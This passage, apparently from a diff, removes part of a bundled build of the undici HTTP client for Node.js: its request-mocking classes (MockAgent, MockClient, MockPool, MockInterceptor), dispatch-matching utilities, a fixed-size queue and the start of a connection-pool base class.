EBAQEBAQEBAQEBAQEBAQEBAQEBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAAAAAABAAACAAAAAAAAAAAAAAAAAAAAAAAAAwQAAAQEBAQEBAQEBAQEBQQEBAQEBAQEBAQEBAAEAAYHBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQABAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAAAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAgAAAAACAAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE5PVU5DRUVDS09VVE5FQ1RFVEVDUklCRUxVU0hFVEVBRFNFQVJDSFJHRUNUSVZJVFlMRU5EQVJWRU9USUZZUFRJT05TQ0hTRUFZU1RBVENIR0VPUkRJUkVDVE9SVFJDSFBBUkFNRVRFUlVSQ0VCU0NSSUJFQVJET1dOQUNFSU5ETktDS1VCU0NSSUJFSFRUUC9BRFRQLw==' - - -/***/ }), - -/***/ 1891: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.enumToMap = void 0; -function enumToMap(obj) { - const res = {}; - Object.keys(obj).forEach((key) => { - const value = obj[key]; - if (typeof value === 'number') { - res[key] = value; - } - }); - return res; -} -exports.enumToMap = enumToMap; -//# sourceMappingURL=utils.js.map - -/***/ }), - -/***/ 6771: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kClients } = __nccwpck_require__(2785) -const Agent = __nccwpck_require__(7890) -const { - kAgent, - kMockAgentSet, - kMockAgentGet, - kDispatches, - kIsMockActive, - kNetConnect, - kGetNetConnect, - kOptions, - kFactory -} = __nccwpck_require__(4347) -const MockClient = __nccwpck_require__(8687) -const MockPool = __nccwpck_require__(6193) -const { matchValue, buildMockOptions } = __nccwpck_require__(9323) -const { InvalidArgumentError, UndiciError } = __nccwpck_require__(8045) -const Dispatcher = __nccwpck_require__(412) -const Pluralizer = __nccwpck_require__(8891) -const PendingInterceptorsFormatter = __nccwpck_require__(6823) - -class FakeWeakRef { - constructor (value) { - this.value = value - } - - deref () { - return this.value - } -} - -class MockAgent extends Dispatcher { - constructor (opts) { - super(opts) - - this[kNetConnect] = true - this[kIsMockActive] = true - - // Instantiate Agent and encapsulate - if ((opts && opts.agent && typeof opts.agent.dispatch !== 'function')) { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - const agent = opts && opts.agent ? opts.agent : new Agent(opts) - this[kAgent] = agent - - this[kClients] = agent[kClients] - this[kOptions] = buildMockOptions(opts) - } - - get (origin) { - let dispatcher = this[kMockAgentGet](origin) - - if (!dispatcher) { - dispatcher = this[kFactory](origin) - this[kMockAgentSet](origin, dispatcher) - } - return dispatcher - } - - dispatch (opts, handler) { - // Call MockAgent.get to perform additional setup before dispatching as normal - this.get(opts.origin) - return this[kAgent].dispatch(opts, handler) - } - - async close () { - await this[kAgent].close() - this[kClients].clear() - } - - deactivate () { - this[kIsMockActive] = false - } - - activate () { - this[kIsMockActive] = true - } - - enableNetConnect (matcher) { - if (typeof matcher === 'string' || typeof matcher === 'function' || matcher instanceof RegExp) { - if (Array.isArray(this[kNetConnect])) { - this[kNetConnect].push(matcher) - } else { - this[kNetConnect] = [matcher] - } - } else if (typeof matcher === 'undefined') { - this[kNetConnect] = true - } else { - throw new InvalidArgumentError('Unsupported matcher. Must be one of String|Function|RegExp.') - } - } - - disableNetConnect () { - this[kNetConnect] = false - } - - // This is required to bypass issues caused by using global symbols - see: - // https://github.com/nodejs/undici/issues/1447 - get isMockActive () { - return this[kIsMockActive] - } - - [kMockAgentSet] (origin, dispatcher) { - this[kClients].set(origin, new FakeWeakRef(dispatcher)) - } - - [kFactory] (origin) { - const mockOptions = Object.assign({ agent: this }, this[kOptions]) - return this[kOptions] && this[kOptions].connections === 1 - ? new MockClient(origin, mockOptions) - : new MockPool(origin, mockOptions) - } - - [kMockAgentGet] (origin) { - // First check if we can immediately find it - const ref = this[kClients].get(origin) - if (ref) { - return ref.deref() - } - - // If the origin is not a string create a dummy parent pool and return to user - if (typeof origin !== 'string') { - const dispatcher = this[kFactory]('http://localhost:9999') - this[kMockAgentSet](origin, dispatcher) - return dispatcher - } - - // If we match, create a pool and assign the same dispatches - for (const [keyMatcher, nonExplicitRef] of Array.from(this[kClients])) { - const nonExplicitDispatcher = nonExplicitRef.deref() - if (nonExplicitDispatcher && typeof keyMatcher !== 'string' && matchValue(keyMatcher, origin)) { - const dispatcher = this[kFactory](origin) - this[kMockAgentSet](origin, dispatcher) - dispatcher[kDispatches] = nonExplicitDispatcher[kDispatches] - return dispatcher - } - } - } - - [kGetNetConnect] () { - return this[kNetConnect] - } - - pendingInterceptors () { - const mockAgentClients = this[kClients] - - return Array.from(mockAgentClients.entries()) - .flatMap(([origin, scope]) => scope.deref()[kDispatches].map(dispatch => ({ ...dispatch, origin }))) - .filter(({ pending }) => pending) - } - - assertNoPendingInterceptors ({ pendingInterceptorsFormatter = new PendingInterceptorsFormatter() } = {}) { - const pending = this.pendingInterceptors() - - if (pending.length === 0) { - return - } - - const pluralizer = new Pluralizer('interceptor', 'interceptors').pluralize(pending.length) - - throw new UndiciError(` -${pluralizer.count} ${pluralizer.noun} ${pluralizer.is} pending: - -${pendingInterceptorsFormatter.format(pending)} -`.trim()) - } -} - -module.exports = MockAgent - - -/***/ }), - -/***/ 8687: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { promisify } = __nccwpck_require__(3837) -const Client = __nccwpck_require__(3598) -const { buildMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kMockAgent, - kClose, - kOriginalClose, - kOrigin, - kOriginalDispatch, - kConnected -} = __nccwpck_require__(4347) -const { MockInterceptor } = __nccwpck_require__(410) -const Symbols = __nccwpck_require__(2785) -const { InvalidArgumentError } = __nccwpck_require__(8045) - -/** - * MockClient provides an API that extends the Client to influence the mockDispatches. - */ -class MockClient extends Client { - constructor (origin, opts) { - super(origin, opts) - - if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - - this[kMockAgent] = opts.agent - this[kOrigin] = origin - this[kDispatches] = [] - this[kConnected] = 1 - this[kOriginalDispatch] = this.dispatch - this[kOriginalClose] = this.close.bind(this) - - this.dispatch = buildMockDispatch.call(this) - this.close = this[kClose] - } - - get [Symbols.kConnected] () { - return this[kConnected] - } - - /** - * Sets up the base interceptor for mocking replies from undici. - */ - intercept (opts) { - return new MockInterceptor(opts, this[kDispatches]) - } - - async [kClose] () { - await promisify(this[kOriginalClose])() - this[kConnected] = 0 - this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) - } -} - -module.exports = MockClient - - -/***/ }), - -/***/ 888: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { UndiciError } = __nccwpck_require__(8045) - -class MockNotMatchedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, MockNotMatchedError) - this.name = 'MockNotMatchedError' - this.message = message || 'The request does not match any registered mock dispatches' - this.code = 'UND_MOCK_ERR_MOCK_NOT_MATCHED' - } -} - -module.exports = { - MockNotMatchedError -} - - -/***/ }), - -/***/ 410: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { getResponseData, buildKey, addMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kDispatchKey, - kDefaultHeaders, - kDefaultTrailers, - kContentLength, - kMockDispatch -} = __nccwpck_require__(4347) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { buildURL } = __nccwpck_require__(3983) - -/** - * Defines the scope API for an interceptor reply - */ -class MockScope { - constructor (mockDispatch) { - this[kMockDispatch] = mockDispatch - } - - /** - * Delay a reply by a set amount in ms. - */ - delay (waitInMs) { - if (typeof waitInMs !== 'number' || !Number.isInteger(waitInMs) || waitInMs <= 0) { - throw new InvalidArgumentError('waitInMs must be a valid integer > 0') - } - - this[kMockDispatch].delay = waitInMs - return this - } - - /** - * For a defined reply, never mark as consumed. - */ - persist () { - this[kMockDispatch].persist = true - return this - } - - /** - * Allow one to define a reply for a set amount of matching requests. - */ - times (repeatTimes) { - if (typeof repeatTimes !== 'number' || !Number.isInteger(repeatTimes) || repeatTimes <= 0) { - throw new InvalidArgumentError('repeatTimes must be a valid integer > 0') - } - - this[kMockDispatch].times = repeatTimes - return this - } -} - -/** - * Defines an interceptor for a Mock - */ -class MockInterceptor { - constructor (opts, mockDispatches) { - if (typeof opts !== 'object') { - throw new InvalidArgumentError('opts must be an object') - } - if (typeof opts.path === 'undefined') { - throw new InvalidArgumentError('opts.path must be defined') - } - if (typeof opts.method === 'undefined') { - opts.method = 'GET' - } - // See https://github.com/nodejs/undici/issues/1245 - // As per RFC 3986, clients are not supposed to send URI - // fragments to servers when they retrieve a document, - if (typeof opts.path === 'string') { - if (opts.query) { - opts.path = buildURL(opts.path, opts.query) - } else { - // Matches https://github.com/nodejs/undici/blob/main/lib/fetch/index.js#L1811 - const parsedURL = new URL(opts.path, 'data://') - opts.path = parsedURL.pathname + parsedURL.search - } - } - if (typeof opts.method === 'string') { - opts.method = opts.method.toUpperCase() - } - - this[kDispatchKey] = buildKey(opts) - this[kDispatches] = mockDispatches - this[kDefaultHeaders] = {} - this[kDefaultTrailers] = {} - this[kContentLength] = false - } - - createMockScopeDispatchData (statusCode, data, responseOptions = {}) { - const responseData = getResponseData(data) - const contentLength = this[kContentLength] ? { 'content-length': responseData.length } : {} - const headers = { ...this[kDefaultHeaders], ...contentLength, ...responseOptions.headers } - const trailers = { ...this[kDefaultTrailers], ...responseOptions.trailers } - - return { statusCode, data, headers, trailers } - } - - validateReplyParameters (statusCode, data, responseOptions) { - if (typeof statusCode === 'undefined') { - throw new InvalidArgumentError('statusCode must be defined') - } - if (typeof data === 'undefined') { - throw new InvalidArgumentError('data must be defined') - } - if (typeof responseOptions !== 'object') { - throw new InvalidArgumentError('responseOptions must be an object') - } - } - - /** - * Mock an undici request with a defined reply. - */ - reply (replyData) { - // Values of reply aren't available right now as they - // can only be available when the reply callback is invoked. - if (typeof replyData === 'function') { - // We'll first wrap the provided callback in another function, - // this function will properly resolve the data from the callback - // when invoked. - const wrappedDefaultsCallback = (opts) => { - // Our reply options callback contains the parameter for statusCode, data and options. - const resolvedData = replyData(opts) - - // Check if it is in the right format - if (typeof resolvedData !== 'object') { - throw new InvalidArgumentError('reply options callback must return an object') - } - - const { statusCode, data = '', responseOptions = {} } = resolvedData - this.validateReplyParameters(statusCode, data, responseOptions) - // Since the values can be obtained immediately we return them - // from this higher order function that will be resolved later. - return { - ...this.createMockScopeDispatchData(statusCode, data, responseOptions) - } - } - - // Add usual dispatch data, but this time set the data parameter to function that will eventually provide data. - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], wrappedDefaultsCallback) - return new MockScope(newMockDispatch) - } - - // We can have either one or three parameters, if we get here, - // we should have 1-3 parameters. So we spread the arguments of - // this function to obtain the parameters, since replyData will always - // just be the statusCode. - const [statusCode, data = '', responseOptions = {}] = [...arguments] - this.validateReplyParameters(statusCode, data, responseOptions) - - // Send in-already provided data like usual - const dispatchData = this.createMockScopeDispatchData(statusCode, data, responseOptions) - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], dispatchData) - return new MockScope(newMockDispatch) - } - - /** - * Mock an undici request with a defined error. - */ - replyWithError (error) { - if (typeof error === 'undefined') { - throw new InvalidArgumentError('error must be defined') - } - - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], { error }) - return new MockScope(newMockDispatch) - } - - /** - * Set default reply headers on the interceptor for subsequent replies - */ - defaultReplyHeaders (headers) { - if (typeof headers === 'undefined') { - throw new InvalidArgumentError('headers must be defined') - } - - this[kDefaultHeaders] = headers - return this - } - - /** - * Set default reply trailers on the interceptor for subsequent replies - */ - defaultReplyTrailers (trailers) { - if (typeof trailers === 'undefined') { - throw new InvalidArgumentError('trailers must be defined') - } - - this[kDefaultTrailers] = trailers - return this - } - - /** - * Set reply content length header for replies on the interceptor - */ - replyContentLength () { - this[kContentLength] = true - return this - } -} - -module.exports.MockInterceptor = MockInterceptor -module.exports.MockScope = MockScope - - -/***/ }), - -/***/ 6193: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { promisify } = __nccwpck_require__(3837) -const Pool = __nccwpck_require__(4634) -const { buildMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kMockAgent, - kClose, - kOriginalClose, - kOrigin, - kOriginalDispatch, - kConnected -} = __nccwpck_require__(4347) -const { MockInterceptor } = __nccwpck_require__(410) -const Symbols = __nccwpck_require__(2785) -const { InvalidArgumentError } = __nccwpck_require__(8045) - -/** - * MockPool provides an API that extends the Pool to influence the mockDispatches. - */ -class MockPool extends Pool { - constructor (origin, opts) { - super(origin, opts) - - if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - - this[kMockAgent] = opts.agent - this[kOrigin] = origin - this[kDispatches] = [] - this[kConnected] = 1 - this[kOriginalDispatch] = this.dispatch - this[kOriginalClose] = this.close.bind(this) - - this.dispatch = buildMockDispatch.call(this) - this.close = this[kClose] - } - - get [Symbols.kConnected] () { - return this[kConnected] - } - - /** - * Sets up the base interceptor for mocking replies from undici. - */ - intercept (opts) { - return new MockInterceptor(opts, this[kDispatches]) - } - - async [kClose] () { - await promisify(this[kOriginalClose])() - this[kConnected] = 0 - this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) - } -} - -module.exports = MockPool - - -/***/ }), - -/***/ 4347: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kAgent: Symbol('agent'), - kOptions: Symbol('options'), - kFactory: Symbol('factory'), - kDispatches: Symbol('dispatches'), - kDispatchKey: Symbol('dispatch key'), - kDefaultHeaders: Symbol('default headers'), - kDefaultTrailers: Symbol('default trailers'), - kContentLength: Symbol('content length'), - kMockAgent: Symbol('mock agent'), - kMockAgentSet: Symbol('mock agent set'), - kMockAgentGet: Symbol('mock agent get'), - kMockDispatch: Symbol('mock dispatch'), - kClose: Symbol('close'), - kOriginalClose: Symbol('original agent close'), - kOrigin: Symbol('origin'), - kIsMockActive: Symbol('is mock active'), - kNetConnect: Symbol('net connect'), - kGetNetConnect: Symbol('get net connect'), - kConnected: Symbol('connected') -} - - -/***/ }), - -/***/ 9323: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { MockNotMatchedError } = __nccwpck_require__(888) -const { - kDispatches, - kMockAgent, - kOriginalDispatch, - kOrigin, - kGetNetConnect -} = __nccwpck_require__(4347) -const { buildURL, nop } = __nccwpck_require__(3983) -const { STATUS_CODES } = __nccwpck_require__(3685) -const { - types: { - isPromise - } -} = __nccwpck_require__(3837) - -function matchValue (match, value) { - if (typeof match === 'string') { - return match === value - } - if (match instanceof RegExp) { - return match.test(value) - } - if (typeof match === 'function') { - return match(value) === true - } - return false -} - -function lowerCaseEntries (headers) { - return Object.fromEntries( - Object.entries(headers).map(([headerName, headerValue]) => { - return [headerName.toLocaleLowerCase(), headerValue] - }) - ) -} - -/** - * @param {import('../../index').Headers|string[]|Record} headers - * @param {string} key - */ -function getHeaderByName (headers, key) { - if (Array.isArray(headers)) { - for (let i = 0; i < headers.length; i += 2) { - if (headers[i].toLocaleLowerCase() === key.toLocaleLowerCase()) { - return headers[i + 1] - } - } - - return undefined - } else if (typeof headers.get === 'function') { - return headers.get(key) - } else { - return lowerCaseEntries(headers)[key.toLocaleLowerCase()] - } -} - -/** @param {string[]} headers */ -function buildHeadersFromArray (headers) { // fetch HeadersList - const clone = headers.slice() - const entries = [] - for (let index = 0; index < clone.length; index += 2) { - entries.push([clone[index], clone[index + 1]]) - } - return Object.fromEntries(entries) -} - -function matchHeaders (mockDispatch, headers) { - if (typeof mockDispatch.headers === 'function') { - if (Array.isArray(headers)) { // fetch HeadersList - headers = buildHeadersFromArray(headers) - } - return mockDispatch.headers(headers ? lowerCaseEntries(headers) : {}) - } - if (typeof mockDispatch.headers === 'undefined') { - return true - } - if (typeof headers !== 'object' || typeof mockDispatch.headers !== 'object') { - return false - } - - for (const [matchHeaderName, matchHeaderValue] of Object.entries(mockDispatch.headers)) { - const headerValue = getHeaderByName(headers, matchHeaderName) - - if (!matchValue(matchHeaderValue, headerValue)) { - return false - } - } - return true -} - -function safeUrl (path) { - if (typeof path !== 'string') { - return path - } - - const pathSegments = path.split('?') - - if (pathSegments.length !== 2) { - return path - } - - const qp = new URLSearchParams(pathSegments.pop()) - qp.sort() - return [...pathSegments, qp.toString()].join('?') -} - -function matchKey (mockDispatch, { path, method, body, headers }) { - const pathMatch = matchValue(mockDispatch.path, path) - const methodMatch = matchValue(mockDispatch.method, method) - const bodyMatch = typeof mockDispatch.body !== 'undefined' ? matchValue(mockDispatch.body, body) : true - const headersMatch = matchHeaders(mockDispatch, headers) - return pathMatch && methodMatch && bodyMatch && headersMatch -} - -function getResponseData (data) { - if (Buffer.isBuffer(data)) { - return data - } else if (typeof data === 'object') { - return JSON.stringify(data) - } else { - return data.toString() - } -} - -function getMockDispatch (mockDispatches, key) { - const basePath = key.query ? buildURL(key.path, key.query) : key.path - const resolvedPath = typeof basePath === 'string' ? safeUrl(basePath) : basePath - - // Match path - let matchedMockDispatches = mockDispatches.filter(({ consumed }) => !consumed).filter(({ path }) => matchValue(safeUrl(path), resolvedPath)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for path '${resolvedPath}'`) - } - - // Match method - matchedMockDispatches = matchedMockDispatches.filter(({ method }) => matchValue(method, key.method)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for method '${key.method}'`) - } - - // Match body - matchedMockDispatches = matchedMockDispatches.filter(({ body }) => typeof body !== 'undefined' ? matchValue(body, key.body) : true) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for body '${key.body}'`) - } - - // Match headers - matchedMockDispatches = matchedMockDispatches.filter((mockDispatch) => matchHeaders(mockDispatch, key.headers)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for headers '${typeof key.headers === 'object' ? JSON.stringify(key.headers) : key.headers}'`) - } - - return matchedMockDispatches[0] -} - -function addMockDispatch (mockDispatches, key, data) { - const baseData = { timesInvoked: 0, times: 1, persist: false, consumed: false } - const replyData = typeof data === 'function' ? { callback: data } : { ...data } - const newMockDispatch = { ...baseData, ...key, pending: true, data: { error: null, ...replyData } } - mockDispatches.push(newMockDispatch) - return newMockDispatch -} - -function deleteMockDispatch (mockDispatches, key) { - const index = mockDispatches.findIndex(dispatch => { - if (!dispatch.consumed) { - return false - } - return matchKey(dispatch, key) - }) - if (index !== -1) { - mockDispatches.splice(index, 1) - } -} - -function buildKey (opts) { - const { path, method, body, headers, query } = opts - return { - path, - method, - body, - headers, - query - } -} - -function generateKeyValues (data) { - return Object.entries(data).reduce((keyValuePairs, [key, value]) => [ - ...keyValuePairs, - Buffer.from(`${key}`), - Array.isArray(value) ? value.map(x => Buffer.from(`${x}`)) : Buffer.from(`${value}`) - ], []) -} - -/** - * @see https://developer.mozilla.org/en-US/docs/Web/HTTP/Status - * @param {number} statusCode - */ -function getStatusText (statusCode) { - return STATUS_CODES[statusCode] || 'unknown' -} - -async function getResponse (body) { - const buffers = [] - for await (const data of body) { - buffers.push(data) - } - return Buffer.concat(buffers).toString('utf8') -} - -/** - * Mock dispatch function used to simulate undici dispatches - */ -function mockDispatch (opts, handler) { - // Get mock dispatch from built key - const key = buildKey(opts) - const mockDispatch = getMockDispatch(this[kDispatches], key) - - mockDispatch.timesInvoked++ - - // Here's where we resolve a callback if a callback is present for the dispatch data. - if (mockDispatch.data.callback) { - mockDispatch.data = { ...mockDispatch.data, ...mockDispatch.data.callback(opts) } - } - - // Parse mockDispatch data - const { data: { statusCode, data, headers, trailers, error }, delay, persist } = mockDispatch - const { timesInvoked, times } = mockDispatch - - // If it's used up and not persistent, mark as consumed - mockDispatch.consumed = !persist && timesInvoked >= times - mockDispatch.pending = timesInvoked < times - - // If specified, trigger dispatch error - if (error !== null) { - deleteMockDispatch(this[kDispatches], key) - handler.onError(error) - return true - } - - // Handle the request with a delay if necessary - if (typeof delay === 'number' && delay > 0) { - setTimeout(() => { - handleReply(this[kDispatches]) - }, delay) - } else { - handleReply(this[kDispatches]) - } - - function handleReply (mockDispatches, _data = data) { - // fetch's HeadersList is a 1D string array - const optsHeaders = Array.isArray(opts.headers) - ? buildHeadersFromArray(opts.headers) - : opts.headers - const body = typeof _data === 'function' - ? _data({ ...opts, headers: optsHeaders }) - : _data - - // util.types.isPromise is likely needed for jest. - if (isPromise(body)) { - // If handleReply is asynchronous, throwing an error - // in the callback will reject the promise, rather than - // synchronously throw the error, which breaks some tests. - // Rather, we wait for the callback to resolve if it is a - // promise, and then re-run handleReply with the new body. - body.then((newData) => handleReply(mockDispatches, newData)) - return - } - - const responseData = getResponseData(body) - const responseHeaders = generateKeyValues(headers) - const responseTrailers = generateKeyValues(trailers) - - handler.abort = nop - handler.onHeaders(statusCode, responseHeaders, resume, getStatusText(statusCode)) - handler.onData(Buffer.from(responseData)) - handler.onComplete(responseTrailers) - deleteMockDispatch(mockDispatches, key) - } - - function resume () {} - - return true -} - -function buildMockDispatch () { - const agent = this[kMockAgent] - const origin = this[kOrigin] - const originalDispatch = this[kOriginalDispatch] - - return function dispatch (opts, handler) { - if (agent.isMockActive) { - try { - mockDispatch.call(this, opts, handler) - } catch (error) { - if (error instanceof MockNotMatchedError) { - const netConnect = agent[kGetNetConnect]() - if (netConnect === false) { - throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect disabled)`) - } - if (checkNetConnect(netConnect, origin)) { - originalDispatch.call(this, opts, handler) - } else { - throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect is not enabled for this origin)`) - } - } else { - throw error - } - } - } else { - originalDispatch.call(this, opts, handler) - } - } -} - -function checkNetConnect (netConnect, origin) { - const url = new URL(origin) - if (netConnect === true) { - return true - } else if (Array.isArray(netConnect) && netConnect.some((matcher) => matchValue(matcher, url.host))) { - return true - } - return false -} - -function buildMockOptions (opts) { - if (opts) { - const { agent, ...mockOptions } = opts - return mockOptions - } -} - -module.exports = { - getResponseData, - getMockDispatch, - addMockDispatch, - deleteMockDispatch, - buildKey, - generateKeyValues, - matchValue, - getResponse, - getStatusText, - mockDispatch, - buildMockDispatch, - checkNetConnect, - buildMockOptions, - getHeaderByName -} - - -/***/ }), - -/***/ 6823: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Transform } = __nccwpck_require__(2781) -const { Console } = __nccwpck_require__(6206) - -/** - * Gets the output of `console.table(…)` as a string. - */ -module.exports = class PendingInterceptorsFormatter { - constructor ({ disableColors } = {}) { - this.transform = new Transform({ - transform (chunk, _enc, cb) { - cb(null, chunk) - } - }) - - this.logger = new Console({ - stdout: this.transform, - inspectOptions: { - colors: !disableColors && !process.env.CI - } - }) - } - - format (pendingInterceptors) { - const withPrettyHeaders = pendingInterceptors.map( - ({ method, path, data: { statusCode }, persist, times, timesInvoked, origin }) => ({ - Method: method, - Origin: origin, - Path: path, - 'Status code': statusCode, - Persistent: persist ? '✅' : 'âŒ', - Invocations: timesInvoked, - Remaining: persist ? Infinity : times - timesInvoked - })) - - this.logger.table(withPrettyHeaders) - return this.transform.read().toString() - } -} - - -/***/ }), - -/***/ 8891: -/***/ ((module) => { - -"use strict"; - - -const singulars = { - pronoun: 'it', - is: 'is', - was: 'was', - this: 'this' -} - -const plurals = { - pronoun: 'they', - is: 'are', - was: 'were', - this: 'these' -} - -module.exports = class Pluralizer { - constructor (singular, plural) { - this.singular = singular - this.plural = plural - } - - pluralize (count) { - const one = count === 1 - const keys = one ? singulars : plurals - const noun = one ? this.singular : this.plural - return { ...keys, count, noun } - } -} - - -/***/ }), - -/***/ 8266: -/***/ ((module) => { - -"use strict"; -/* eslint-disable */ - - - -// Extracted from node/lib/internal/fixed_queue.js - -// Currently optimal queue size, tested on V8 6.0 - 6.6. Must be power of two. -const kSize = 2048; -const kMask = kSize - 1; - -// The FixedQueue is implemented as a singly-linked list of fixed-size -// circular buffers. It looks something like this: -// -// head tail -// | | -// v v -// +-----------+ <-----\ +-----------+ <------\ +-----------+ -// | [null] | \----- | next | \------- | next | -// +-----------+ +-----------+ +-----------+ -// | item | <-- bottom | item | <-- bottom | [empty] | -// | item | | item | | [empty] | -// | item | | item | | [empty] | -// | item | | item | | [empty] | -// | item | | item | bottom --> | item | -// | item | | item | | item | -// | ... | | ... | | ... | -// | item | | item | | item | -// | item | | item | | item | -// | [empty] | <-- top | item | | item | -// | [empty] | | item | | item | -// | [empty] | | [empty] | <-- top top --> | [empty] | -// +-----------+ +-----------+ +-----------+ -// -// Or, if there is only one circular buffer, it looks something -// like either of these: -// -// head tail head tail -// | | | | -// v v v v -// +-----------+ +-----------+ -// | [null] | | [null] | -// +-----------+ +-----------+ -// | [empty] | | item | -// | [empty] | | item | -// | item | <-- bottom top --> | [empty] | -// | item | | [empty] | -// | [empty] | <-- top bottom --> | item | -// | [empty] | | item | -// +-----------+ +-----------+ -// -// Adding a value means moving `top` forward by one, removing means -// moving `bottom` forward by one. After reaching the end, the queue -// wraps around. -// -// When `top === bottom` the current queue is empty and when -// `top + 1 === bottom` it's full. This wastes a single space of storage -// but allows much quicker checks. - -class FixedCircularBuffer { - constructor() { - this.bottom = 0; - this.top = 0; - this.list = new Array(kSize); - this.next = null; - } - - isEmpty() { - return this.top === this.bottom; - } - - isFull() { - return ((this.top + 1) & kMask) === this.bottom; - } - - push(data) { - this.list[this.top] = data; - this.top = (this.top + 1) & kMask; - } - - shift() { - const nextItem = this.list[this.bottom]; - if (nextItem === undefined) - return null; - this.list[this.bottom] = undefined; - this.bottom = (this.bottom + 1) & kMask; - return nextItem; - } -} - -module.exports = class FixedQueue { - constructor() { - this.head = this.tail = new FixedCircularBuffer(); - } - - isEmpty() { - return this.head.isEmpty(); - } - - push(data) { - if (this.head.isFull()) { - // Head is full: Creates a new queue, sets the old queue's `.next` to it, - // and sets it as the new main queue. - this.head = this.head.next = new FixedCircularBuffer(); - } - this.head.push(data); - } - - shift() { - const tail = this.tail; - const next = tail.shift(); - if (tail.isEmpty() && tail.next !== null) { - // If there is another queue, it forms the new tail. - this.tail = tail.next; - } - return next; - } -}; - - -/***/ }), - -/***/ 3198: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const DispatcherBase = __nccwpck_require__(4839) -const FixedQueue = __nccwpck_require__(8266) -const { kConnected, kSize, kRunning, kPending, kQueued, kBusy, kFree, kUrl, kClose, kDestroy, kDispatch } = __nccwpck_require__(2785) -const PoolStats = __nccwpck_require__(9689) - -const kClients = Symbol('clients') -const kNeedDrain = Symbol('needDrain') -const kQueue = Symbol('queue') -const kClosedResolve = Symbol('closed resolve') -const kOnDrain = Symbol('onDrain') -const kOnConnect = Symbol('onConnect') -const kOnDisconnect = Symbol('onDisconnect') -const kOnConnectionError = Symbol('onConnectionError') -const kGetDispatcher = Symbol('get dispatcher') -const kAddClient = Symbol('add client') -const kRemoveClient = Symbol('remove client') -const kStats = Symbol('stats') - -class PoolBase extends DispatcherBase { - constructor () { - super() - - this[kQueue] = new FixedQueue() - this[kClients] = [] - this[kQueued] = 0 - - const pool = this - - this[kOnDrain] = function onDrain (origin, targets) { - const queue = 